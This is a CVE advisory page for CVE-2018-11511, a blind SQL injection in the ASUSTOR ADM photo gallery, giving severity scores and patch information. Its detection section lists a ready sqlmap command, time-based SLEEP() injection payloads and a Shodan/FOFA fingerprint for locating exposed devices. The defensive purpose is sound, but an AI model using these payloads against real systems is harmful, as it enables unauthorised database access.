cbcvebase.
CVE-2018-11511
published 2018-08-16

CVE-2018-11511: The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope'…

PriorityP179critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
11.18%
95.4th percentile
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.

Affected

1 ranges
VendorProductVersion rangeFixed in
asustorasustor_data_master

Detection & IOCsextracted from sources · hover to see the quote

url/photo-gallery/api/album/tree_lists/
url/photo-gallery/api/photo/search/
commandsqlmap -u "https://<TARGET>/photo-gallery/api/album/tree_lists/" --data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2" --random-agent --risk=2 --dbms=mysql
commandalbum_id=106299411 AND SLEEP(5)&start=0&limit=100&order=name_asc&api=v2
commandkeyword=jpg&scope=106299414 AND SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
commandalbum_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2
commandkeyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
  • Detect time-based blind SQLi attempts against the album_id POST parameter at /photo-gallery/api/album/tree_lists/ — look for SLEEP() payloads in POST body with duration >= 9 seconds response time.
  • Detect time-based blind SQLi attempts against the scope POST parameter at /photo-gallery/api/photo/search/ — look for SLEEP() payloads in POST body.
  • Boolean-based blind SQLi can also be detected via AND clause payloads such as 'AND 4644=4644' in the album_id parameter.
  • Use FOFA/Shodan fingerprinting to identify exposed ASUSTOR ADM instances as targets: search for body containing 'ASUSTOR' with icon_hash '1678170702'.
  • ·Both vulnerable endpoints (/photo-gallery/api/album/tree_lists/ and /photo-gallery/api/photo/search/) require POST requests with Content-Type: application/x-www-form-urlencoded; GET-based detection will miss this vulnerability.
  • ·The vulnerability affects ASUSTOR ADM 3.1.0.RFQ3 and all previous builds; the RCE (CVE-2018-11510) was patched in ADM 3.1.3 on May 31, 2018, but the SQLi (CVE-2018-11511) should also be addressed by upgrading to ADM 3.1.3.
  • ·The SQLi is blind (both boolean-based and time-based); no direct error output is returned, making detection reliant on response timing or differential boolean responses rather than error messages.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.